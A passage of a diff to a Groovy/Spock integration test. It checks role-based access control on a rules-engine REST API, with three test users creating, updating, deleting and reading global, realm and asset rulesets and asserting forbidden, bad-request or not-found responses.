-        when: "a realm ruleset is created in a non-authenticated realm"
-        realmRuleset = new RealmRuleset(keycloakTestSetup.realmCity.name, "Test realm definition", FLOW, "SomeRulesCode")
-        rulesetResource.createRealmRuleset(null, realmRuleset)
+    then: "result should match"
+    assetRuleset.id == rulesetId
+    assetRuleset.version == 1
+    assetRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    assetRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
+    assetRuleset.name == "Renamed test asset definition"
+    assetRuleset.rules == "SomeRulesCodeModified"
+    assetRuleset.assetId == managerTestSetup.smartOfficeId
 
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.assetEngines.get(managerTestSetup.smartOfficeId).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == assetRuleset.version
+    }
 
-        when: "an asset ruleset is created in the authenticated realm"
-        def assetRuleset = new AssetRuleset(
+    when: "an asset ruleset is updated with an invalid asset ID"
+    assetRuleset.assetId = "thisdoesnotexist"
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "an asset ruleset is updated with an invalid id"
+    assetRuleset.assetId = managerTestSetup.smartOfficeId
+    assetRuleset.id = 1234567890l
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "a non-existent asset ruleset is updated"
+    rulesetResource.updateAssetRuleset(null, 1234567890l, assetRuleset)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
+
+    when: "an asset ruleset is deleted"
+    rulesetResource.deleteAssetRuleset(null, rulesetId)
+    rulesetResource.getAssetRuleset(null, rulesetId)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
+
+    and: "the ruleset should be removed from the engine"
+    conditions.eventually {
+      assert rulesService.assetEngines.get(managerTestSetup.smartOfficeId) == null
+    }
+
+    when: "an asset ruleset is created in a non-authenticated realm"
+    assetRuleset = new AssetRuleset(managerTestSetup.apartment2Id, "Test asset definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+    rulesetId = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)[1].id
+    assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
+    lastModified = assetRuleset.lastModified
+
+    then: "result should match"
+    assetRuleset.id == rulesetId
+    assetRuleset.version == 0
+    assetRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    lastModified.toEpochMilli() <System.currentTimeMillis()
+    assetRuleset.name == "Test asset definition"
+    assetRuleset.rules == "SomeRulesCode"
+    assetRuleset.assetId == managerTestSetup.apartment2Id
+
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.assetEngines.get(managerTestSetup.apartment2Id).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == assetRuleset.version
+    }
+  }
+
+  def "Access rules as testuser1"() {
+
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def rulesService = container.getService(RulesService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "some imported rulesets"
+    def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+
+    and: "an authenticated test user"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
+
+    and: "the ruleset resource"
+    def rulesetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(RulesResource.class)
+
+    expect: "the rules engines to be ready"
+    conditions.eventually {
+      rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
+    }
+
+    /* ############################################## READ ####################################### */
+
+    when: "the global rules are retrieved"
+    rulesetResource.getGlobalRulesets(null, null, false)
+
+    then: "access should be forbidden"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "some realm rules are retrieved"
+    def ruleDefinitions = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmMaster.name, null, false)
+
+    then: "result should match"
+    ruleDefinitions.length == 1
+    ruleDefinitions[0].name == "Some master realm demo rules"
+
+    when: "some realm rules in a non-authenticated realm are retrieved"
+    rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "some asset rules in a non-authenticated realm are retrieved"
+    rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    /* ############################################## WRITE ####################################### */
+
+    when: "a global rule is created"
+    def ruleDefinition = new GlobalRuleset("Test definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createGlobalRuleset(null, ruleDefinition)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "a global rule is updated"
+    rulesetResource.updateGlobalRuleset(null, 1234567890l, ruleDefinition)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "a global rule is deleted"
+    rulesetResource.deleteGlobalRuleset(null, 1234567890l)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+
+    when: "a realm ruleset is created in the authenticated realm"
+    def realmRuleset = new RealmRuleset(MASTER_REALM, "Test realm definition", Ruleset.Lang.JSON, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+    def rulesetId = rulesetResource.getRealmRulesets(null, MASTER_REALM, null, false)[1].id
+    realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
+    def lastModified = realmRuleset.lastModified
+
+    then: "result should match"
+    realmRuleset.id == rulesetId
+    realmRuleset.version == 0
+    realmRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    lastModified.toEpochMilli() <System.currentTimeMillis()
+    realmRuleset.name == "Test realm definition"
+    realmRuleset.rules == "SomeRulesCode"
+    realmRuleset.realm == MASTER_REALM
+
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == realmRuleset.version
+    }
+
+    when: "a realm ruleset is updated"
+    realmRuleset.name = "Renamed test realm definition"
+    realmRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
+    realmRuleset = rulesetResource.getRealmRuleset(null, rulesetId)
+
+    then: "result should match"
+    realmRuleset.id == rulesetId
+    realmRuleset.version == 1
+    realmRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    realmRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
+    realmRuleset.name == "Renamed test realm definition"
+    realmRuleset.rules == "SomeRulesCodeModified"
+    realmRuleset.realm == keycloakTestSetup.realmMaster.name
+
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == realmRuleset.version
+    }
+
+    when: "a realm ruleset is updated with an invalid realm"
+    realmRuleset.realm = "thisdoesnotexist"
+    rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "a realm ruleset is updated with an invalid id"
+    realmRuleset.realm = keycloakTestSetup.realmMaster.name
+    realmRuleset.id = 1234567890l
+    rulesetResource.updateRealmRuleset(null, rulesetId, realmRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      return true
+    }
+
+    when: "a non-existent realm ruleset is updated"
+    rulesetResource.updateRealmRuleset(null, 1234567890l, realmRuleset)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      return true
+    }
+
+    when: "a realm ruleset is deleted"
+    rulesetResource.deleteRealmRuleset(null, rulesetId)
+    rulesetResource.getRealmRuleset(null, rulesetId)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      true
+    }
+
+    and: "the ruleset should be removed from the engine"
+    conditions.eventually {
+      def deployment = rulesService.realmEngines.get(MASTER_REALM).deployments.get(rulesetId)
+      assert deployment == null
+    }
+
+    when: "a groovy realm ruleset is created"
+    realmRuleset = new RealmRuleset(MASTER_REALM, "Test realm definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is created in a non-authenticated realm"
+    realmRuleset = new RealmRuleset(keycloakTestSetup.realmBuilding.name, "Test realm definition", FLOW, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "an asset ruleset is created in the authenticated realm"
+    def assetRuleset = new AssetRuleset(managerTestSetup.smartOfficeId, "Test asset definition", FLOW, "SomeRulesCode")
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+    rulesetId = rulesetResource.getAssetRulesets(null, managerTestSetup.smartOfficeId, null, false)[0].id
+    assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
+    lastModified = assetRuleset.lastModified
+
+    then: "result should match"
+    assetRuleset.id == rulesetId
+    assetRuleset.version == 0
+    assetRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    lastModified.toEpochMilli() <System.currentTimeMillis()
+    assetRuleset.name == "Test asset definition"
+    assetRuleset.rules == "SomeRulesCode"
+    assetRuleset.assetId == managerTestSetup.smartOfficeId
+
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.assetEngines.get(managerTestSetup.smartOfficeId).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == assetRuleset.version
+    }
+
+    when: "an asset ruleset is updated"
+    assetRuleset.name = "Renamed test asset definition"
+    assetRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+    assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
+
+    then: "result should match"
+    assetRuleset.id == rulesetId
+    assetRuleset.version == 1
+    assetRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    assetRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
+    assetRuleset.name == "Renamed test asset definition"
+    assetRuleset.rules == "SomeRulesCodeModified"
+    assetRuleset.assetId == managerTestSetup.smartOfficeId
+
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.assetEngines.get(managerTestSetup.smartOfficeId).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == assetRuleset.version
+    }
+
+    when: "an asset ruleset is updated with an invalid asset ID"
+    assetRuleset.assetId = "thisdoesnotexist"
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      true
+    }
+
+    when: "an asset ruleset is updated with an invalid id"
+    assetRuleset.assetId = managerTestSetup.smartOfficeId
+    assetRuleset.id = 1234567890l
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      true
+    }
+
+    when: "a non-existent asset ruleset is updated"
+    rulesetResource.updateAssetRuleset(null, 1234567890l, assetRuleset)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      true
+    }
+
+    when: "an asset ruleset is deleted"
+    rulesetResource.deleteAssetRuleset(null, rulesetId)
+    rulesetResource.getAssetRuleset(null, rulesetId)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      true
+    }
+
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      assert rulesService.assetEngines.get(managerTestSetup.smartOfficeId) == null
+    }
+
+    when: "an asset ruleset is created in a non-authenticated realm"
+    assetRuleset = new AssetRuleset(managerTestSetup.apartment2Id, "Test asset definition", JSON, "SomeRulesCode")
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+  }
+
+  def "Access rules as testuser2"() {
+
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def rulesService = container.getService(RulesService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "some imported rulesets"
+    def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+
+    and: "an authenticated test user"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser2",
+            "testuser2"
+            )
+
+    and: "the ruleset resource"
+    def rulesetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(RulesResource.class)
+
+    expect: "the rules engines to be ready"
+    conditions.eventually {
+      rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
+    }
+
+    /* ############################################## READ ####################################### */
+
+    when: "the global rules are retrieved"
+    rulesetResource.getGlobalRulesets(null, null, false)
+
+    then: "access should be forbidden"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "some realm rules in a non-authenticated realm are retrieved"
+    rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmMaster.name, null, false)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "some realm rules in the authenticated realm are retrieved by user without rules read role"
+    def rulesets = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)
+
+    then: "no rulesets should be returned"
+    rulesets.length == 0
+
+    when: "some asset rules in the authenticated realm are retrieved by the user without rules read role"
+    rulesets = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)
+
+    then: "no rulesets should be returned"
+    rulesets.length == 0
+
+    /* ############################################## WRITE ####################################### */
+
+    when: "a global rule is created"
+    def ruleDefinition = new GlobalRuleset("Test definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createGlobalRuleset(null, ruleDefinition)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a global rule is updated"
+    rulesetResource.updateGlobalRuleset(null, 1234567890l, ruleDefinition)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a global rule is deleted"
+    rulesetResource.deleteGlobalRuleset(null, 1234567890l)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is created in the authenticated realm"
+    def realmRuleset = new RealmRuleset(keycloakTestSetup.realmBuilding.name, "Test realm definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is updated"
+    rulesetResource.updateRealmRuleset(null, 1234567890l, realmRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is deleted"
+    rulesetResource.deleteRealmRuleset(null, 1234567890l)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is created in a non-authenticated realm"
+    realmRuleset = new RealmRuleset(keycloakTestSetup.realmCity.name, "Test realm definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is created in the authenticated realm"
+    def assetRuleset = new AssetRuleset(keycloakTestSetup.realmBuilding.name, "Test asset definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is updated"
+    rulesetResource.updateAssetRuleset(null, 1234567890l, assetRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is deleted"
+    rulesetResource.deleteAssetRuleset(null, 1234567890l)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is created in a non-authenticated realm"
+    assetRuleset = new AssetRuleset(keycloakTestSetup.realmCity.name, "Test asset definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+  }
+
+  def "Access rules as testuser3"() {
+
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    def rulesService = container.getService(RulesService.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+
+    and: "some imported rulesets"
+    def rulesImport = new BasicRulesImport(rulesetStorageService, keycloakTestSetup, managerTestSetup)
+
+    and: "an authenticated test user"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+
+    and: "the ruleset resource"
+    def rulesetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(RulesResource.class)
+
+    expect: "the rules engines to be ready"
+    conditions.eventually {
+      rulesImport.assertEnginesReady(rulesService, keycloakTestSetup, managerTestSetup)
+    }
+
+    /* ############################################## READ ####################################### */
+
+    when: "the global rules are retrieved"
+    rulesetResource.getGlobalRulesets(null, null, false)
+
+    then: "access should be forbidden"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "some realm rules in a non-authenticated realm are retrieved"
+    rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmMaster.name, null, false)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "some realm rules in the authenticated realm are retrieved by the restricted user"
+    def rulesets = rulesetResource.getRealmRulesets(null, keycloakTestSetup.realmBuilding.name, null, false)
+
+    then: "no rulesets should be returned"
+    rulesets.length == 0
+
+    when: "some asset rules of a protected assigned asset are retrieved"
+    def ruleDefinitions = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment1Id, null, false)
+
+    then: "result should match"
+    ruleDefinitions.length == 1
+    ruleDefinitions[0].name == "Some apartment 1 demo rules"
+
+    when: "some asset rules of a protected but not assigned asset are retrieved"
+    rulesetResource.getAssetRulesets(null, managerTestSetup.apartment2Id, null, false)
+
+    then: "no rulesets should be returned"
+    rulesets.length == 0
+
+    /* ############################################## WRITE ####################################### */
+
+    when: "a global rule is created"
+    def ruleDefinition = new GlobalRuleset("Test definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createGlobalRuleset(null, ruleDefinition)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a global rule is updated"
+    rulesetResource.updateGlobalRuleset(null, 1234567890l, ruleDefinition)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a global rule is deleted"
+    rulesetResource.deleteGlobalRuleset(null, 1234567890l)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is created in the authenticated realm"
+    def realmRuleset = new RealmRuleset(keycloakTestSetup.realmBuilding.name, "Test realm definition", GROOVY, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "a realm ruleset is updated"
+    rulesetResource.updateRealmRuleset(null, 1234567890l, realmRuleset)
+
+    then: "result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      true
+    }
+
+    when: "a realm ruleset is deleted"
+    rulesetResource.deleteRealmRuleset(null, 1234567890l)
+    rulesetResource.getRealmRuleset(null, 1234567890l)
+
+    then: "the result should be not found"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 404
+      true
+    }
+
+    when: "a realm ruleset is created in a non-authenticated realm"
+    realmRuleset = new RealmRuleset(keycloakTestSetup.realmCity.name, "Test realm definition", FLOW, "SomeRulesCode")
+    rulesetResource.createRealmRuleset(null, realmRuleset)
+
+    then: "access should be forbidden"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      true
+    }
+
+    when: "an asset ruleset is created in the authenticated realm"
+    def assetRuleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Test asset definition",
             FLOW, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-        def rulesetId = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment1Id, null, false)[1].id
-        assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
-        def lastModified = assetRuleset.lastModified
+    rulesetResource.createAssetRuleset(null, assetRuleset)
+    def rulesetId = rulesetResource.getAssetRulesets(null, managerTestSetup.apartment1Id, null, false)[1].id
+    assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
+    def lastModified = assetRuleset.lastModified
 
-        then: "result should match"
-        assetRuleset.id == rulesetId
-        assetRuleset.version == 0
-        assetRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        lastModified.toEpochMilli() < System.currentTimeMillis()
-        assetRuleset.name == "Test asset definition"
-        assetRuleset.rules == "SomeRulesCode"
-        assetRuleset.assetId == managerTestSetup.apartment1Id
+    then: "result should match"
+    assetRuleset.id == rulesetId
+    assetRuleset.version == 0
+    assetRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    lastModified.toEpochMilli() <System.currentTimeMillis()
+    assetRuleset.name == "Test asset definition"
+    assetRuleset.rules == "SomeRulesCode"
+    assetRuleset.assetId == managerTestSetup.apartment1Id
 
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.assetEngines.get(managerTestSetup.apartment1Id).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == assetRuleset.version
-        }
-
-        when: "an asset ruleset is updated"
-        assetRuleset.name = "Renamed test asset definition"
-        assetRuleset.rules = "SomeRulesCodeModified"
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-        assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
-
-        then: "result should match"
-        assetRuleset.id == rulesetId
-        assetRuleset.version == 1
-        assetRuleset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        assetRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
-        assetRuleset.name == "Renamed test asset definition"
-        assetRuleset.rules == "SomeRulesCodeModified"
-        assetRuleset.assetId == managerTestSetup.apartment1Id
-
-        and: "the ruleset should reach the engine"
-        conditions.eventually {
-            def deployment = rulesService.assetEngines.get(managerTestSetup.apartment1Id).deployments.get(rulesetId)
-            assert deployment != null
-            assert deployment.ruleset.version == assetRuleset.version
-        }
-
-        when: "an asset ruleset is updated with a changed asset ID"
-        assetRuleset.assetId = managerTestSetup.apartment3Id
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            true
-        }
-
-        when: "an asset ruleset is updated with a changed invalid asset ID"
-        assetRuleset.assetId = "thisdoesnotexist"
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            true
-        }
-
-        when: "an asset ruleset is updated with an invalid id"
-        assetRuleset.assetId = managerTestSetup.apartment1Id
-        assetRuleset.id = 1234567890l
-        rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
-
-        then: "the request should be bad"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 400
-            true
-        }
-
-        when: "a non-existent asset ruleset is updated"
-        rulesetResource.updateAssetRuleset(null, 1234567890l, assetRuleset)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            true
-        }
-
-        when: "an asset ruleset is deleted"
-        rulesetResource.deleteAssetRuleset(null, rulesetId)
-        rulesetResource.getAssetRuleset(null, rulesetId)
-
-        then: "the result should be not found"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 404
-            true
-        }
-
-        and: "the ruleset should be removed from the engine"
-        conditions.eventually {
-            assert rulesService.assetEngines.get(managerTestSetup.apartment1Id) == null
-        }
-
-        when: "an asset ruleset is created in the authenticated realm but on a forbidden asset"
-        assetRuleset = new AssetRuleset(managerTestSetup.apartment3Id, "Test asset definition", FLOW, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
-
-        when: "an asset ruleset is created in a non-authenticated realm"
-        assetRuleset = new AssetRuleset(managerTestSetup.smartOfficeId, "Test asset definition", FLOW, "SomeRulesCode")
-        rulesetResource.createAssetRuleset(null, assetRuleset)
-
-        then: "access should be forbidden"
-        ex = thrown()
-        ex.response.withCloseable { r ->
-            assert r.status == 403
-            true
-        }
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.assetEngines.get(managerTestSetup.apartment1Id).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == assetRuleset.version
     }
 
-    def "JavaScript ruleset create requests are rejected"() {
+    when: "an asset ruleset is updated"
+    assetRuleset.name = "Renamed test asset definition"
+    assetRuleset.rules = "SomeRulesCodeModified"
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+    assetRuleset = rulesetResource.getAssetRuleset(null, rulesetId)
 
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    then: "result should match"
+    assetRuleset.id == rulesetId
+    assetRuleset.version == 1
+    assetRuleset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    assetRuleset.lastModified.toEpochMilli() > lastModified.toEpochMilli()
+    assetRuleset.name == "Renamed test asset definition"
+    assetRuleset.rules == "SomeRulesCodeModified"
+    assetRuleset.assetId == managerTestSetup.apartment1Id
 
-        and: "an authenticated admin user"
-        def accessToken = authenticate(
+    and: "the ruleset should reach the engine"
+    conditions.eventually {
+      def deployment = rulesService.assetEngines.get(managerTestSetup.apartment1Id).deployments.get(rulesetId)
+      assert deployment != null
+      assert deployment.ruleset.version == assetRuleset.version
+    }
+
+    when: "an asset ruleset is updated with a changed asset ID"
+    assetRuleset.assetId = managerTestSetup.apartment3Id
+    rulesetResource.updateAssetRuleset(null, rulesetId, assetRuleset)
+
+    then: "the request should be bad"
+    ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 400
+      true
+    }
+
+    when: "an asset ruleset is updated with a changed invalid asset ID"
+    assetRuleset.assetId = "thisdoesnotexist"
